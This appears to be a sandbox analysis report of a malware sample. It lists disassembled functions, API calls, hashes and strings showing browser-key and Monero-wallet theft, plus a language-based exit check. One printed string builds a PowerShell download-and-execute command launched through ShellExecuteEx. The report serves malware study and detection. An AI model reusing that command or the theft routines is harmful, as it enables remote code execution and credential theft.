Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3240024479-1526165396
Opcode ID: 7a53621b679fdddd9866b0af15fa3747b3cdcc0125e6dff7590f698bc3c21a28
Instruction ID: 2fe34573e89b0880b0a525b57e7ab3f9cdc5843879d575db440ed975e164ba46
Opcode Fuzzy Hash: 7a53621b679fdddd9866b0af15fa3747b3cdcc0125e6dff7590f698bc3c21a28
Instruction Fuzzy Hash: 4B51FE309201499BDF14FF64CD96AED77F9AF11300F5044B8F40A6A5A2DF346B46CBA2

Function 00B912D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID:
API String ID: 2001356338-0
Opcode ID: dc713e92fb0c9f77c519bb519f9f7be1f1e5083303eb9284d6ab9ee1da138fe0
Instruction ID: 80bed7efd2f90a5a7fd165b94af8166ea33ef0fc755202c4af3d1257d372346e
Opcode Fuzzy Hash: dc713e92fb0c9f77c519bb519f9f7be1f1e5083303eb9284d6ab9ee1da138fe0
Instruction Fuzzy Hash: 1CC185B590021E9BCF14EF64DC89FEA77B8BF54304F0045E9F50AA7241DA74AA85CFA1

Function 00B94280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B98DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B98E0B

lstrcat.KERNEL32(?,00000000), ref: 00B942EC
lstrcat.KERNEL32(?,0133E448), ref: 00B9430B
lstrcat.KERNEL32(?,?), ref: 00B9431F
lstrcat.KERNEL32(?,0133D4C8), ref: 00B94333

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

Part of subcall function 00B98D90: GetFileAttributesA.KERNEL32(00000000,?,00B81B54,?,?,00BA564C,?,?,00BA0E1F), ref: 00B98D9F

Part of subcall function 00B89CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00B89D39

Part of subcall function 00B899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B899EC
Part of subcall function 00B899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B89A11
Part of subcall function 00B899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00B89A31
Part of subcall function 00B899C0: ReadFile.KERNEL32(000000FF,?,00000000,00B8148F,00000000), ref: 00B89A5A
Part of subcall function 00B899C0: LocalFree.KERNEL32(00B8148F), ref: 00B89A90
Part of subcall function 00B899C0: CloseHandle.KERNEL32(000000FF), ref: 00B89A9A

Part of subcall function 00B993C0: GlobalAlloc.KERNEL32(00000000,00B943DD,00B943DD), ref: 00B993D3

StrStrA.SHLWAPI(?,0133E538), ref: 00B943F3
GlobalFree.KERNEL32(?), ref: 00B94512

Part of subcall function 00B89AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B84EEE,00000000,00000000), ref: 00B89AEF
Part of subcall function 00B89AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00B84EEE,00000000,?), ref: 00B89B01
Part of subcall function 00B89AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B84EEE,00000000,00000000), ref: 00B89B2A
Part of subcall function 00B89AC0: LocalFree.KERNEL32(?,?,?,?,00B84EEE,00000000,?), ref: 00B89B3F

lstrcat.KERNEL32(?,00000000), ref: 00B944A3
StrCmpCA.SHLWAPI(?,00BA08D1), ref: 00B944C0
lstrcat.KERNEL32(00000000,00000000), ref: 00B944D2
lstrcat.KERNEL32(00000000,?), ref: 00B944E5
lstrcat.KERNEL32(00000000,00BA0FB8), ref: 00B944F4

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 3541710228-0
Opcode ID: e1b6c871942a6eda14ddbf1cdcdeeb0405a7fa274eadb1e7d2afa214ad0aa68e
Instruction ID: 1c23a820c21994d90a3bb773f9e0f8d7113ed21b797f6c835b5209e3f03a5ead
Opcode Fuzzy Hash: e1b6c871942a6eda14ddbf1cdcdeeb0405a7fa274eadb1e7d2afa214ad0aa68e
Instruction Fuzzy Hash: EF7142B6910209ABDF14FBA4DC85FEE73B9AF48304F0445E8F605A6181EA35DB45CFA1

Function 00B96770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32 ref: 00B96774
ExitProcess.KERNEL32 ref: 00B967A5
ExitProcess.KERNEL32 ref: 00B967AF
ExitProcess.KERNEL32 ref: 00B967B9
ExitProcess.KERNEL32 ref: 00B967C3
ExitProcess.KERNEL32 ref: 00B967CD

Strings

*, xrefs: 00B9678C

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess$DefaultLangUser
String ID: *
API String ID: 1494266314-163128923
Opcode ID: 0d1b614beb84613ea8b37623feb09e65c01f403f19cdfa1e91cf4299d8c9ada4
Instruction ID: e3b9b6cb02f6f753c4a9b570c0b2fb186f07a54af2336b2f7eb4cae2e647b7bd
Opcode Fuzzy Hash: 0d1b614beb84613ea8b37623feb09e65c01f403f19cdfa1e91cf4299d8c9ada4
Instruction Fuzzy Hash: B7F0173090420BEBD7449FE8AD1DB287B70FB0470AF140199F609863D0DA744A419BE6

Function 00B9C84E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

memset.MSVCRT ref: 00B9C8BF
___crtGetStringTypeA.LIBCMT ref: 00B9C8EC
___crtLCMapStringA.LIBCMT ref: 00B9C90C
___crtLCMapStringA.LIBCMT ref: 00B9C931

Strings

, xrefs: 00B9C896

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: String___crt$Typememset
String ID:
API String ID: 3530896902-3916222277
Opcode ID: 0b096a6b636af41d38a5ceb70c4a79318289b9c55851bde8a96c0c39b46fb3a8
Instruction ID: bb9ec727a83969914cfb6e9abc08b542e22d71f226796fa0e098116da4d3dd2f
Opcode Fuzzy Hash: 0b096a6b636af41d38a5ceb70c4a79318289b9c55851bde8a96c0c39b46fb3a8
Instruction Fuzzy Hash: 5B41E3B150079C5FDF228B248D95FFBBFE8EB45704F2444F8E98A86182E2719A44DF64

Function 00B92C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

Part of subcall function 00B9A9B0: lstrlen.KERNEL32(?,01339040,?,\Monero\wallet.keys,00BA0E17), ref: 00B9A9C5
Part of subcall function 00B9A9B0: lstrcpy.KERNEL32(00000000), ref: 00B9AA04
Part of subcall function 00B9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B9AA12

Part of subcall function 00B9A920: lstrcpy.KERNEL32(00000000,?), ref: 00B9A972
Part of subcall function 00B9A920: lstrcat.KERNEL32(00000000), ref: 00B9A982

Part of subcall function 00B9A8A0: lstrcpy.KERNEL32(?,00BA0E17), ref: 00B9A905

ShellExecuteEx.SHELL32(0000003C), ref: 00B92D85

Strings

')", xrefs: 00B92CB3
-nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00B92CC4
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00B92D04
<, xrefs: 00B92D39

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 3031569214-898575020
Opcode ID: 592a20e630fa20cfe629b035d8b30e500181ff1d79aafe8f60a87654b8e5a5ca
Instruction ID: f1f00b4c701f73e36409aac9123e2d883a57f4066795b58f2a18d3a765360acd
Opcode Fuzzy Hash: 592a20e630fa20cfe629b035d8b30e500181ff1d79aafe8f60a87654b8e5a5ca
Instruction Fuzzy Hash: 0441BD71D102189ADF14FBA0C892BEDB7F8AF15300F4041B9E116B6191DF746A4ACFD6

Function 00B89E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?), ref: 00B89F41

Part of subcall function 00B9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B9A7E6

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

Strings

v20, xrefs: 00B89E21
ERROR_RUN_EXTRACTOR, xrefs: 00B89E67
@, xrefs: 00B89EF1
v10, xrefs: 00B89EA3

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocLocal
String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
API String ID: 4171519190-1096346117
Opcode ID: 46bf8ca59589eced05cf9d9c3b3a5443497e2fc6dc1c14657e7c1046a9bc16f0
Instruction ID: 52fd92b27d1d9515c55ebdd681405dcf2edac2200a9be14a349df61574aec136
Opcode Fuzzy Hash: 46bf8ca59589eced05cf9d9c3b3a5443497e2fc6dc1c14657e7c1046a9bc16f0
Instruction Fuzzy Hash: 68613171A10248DBDF14EFA4CC96FED77F9AF45300F008468F9099B591DB746A06CB92

Function 00B96920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 00B9696C
sscanf.NTDLL ref: 00B96999
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00B969B2
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00B969C0
ExitProcess.KERNEL32 ref: 00B969DA

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID:
API String ID: 2533653975-0
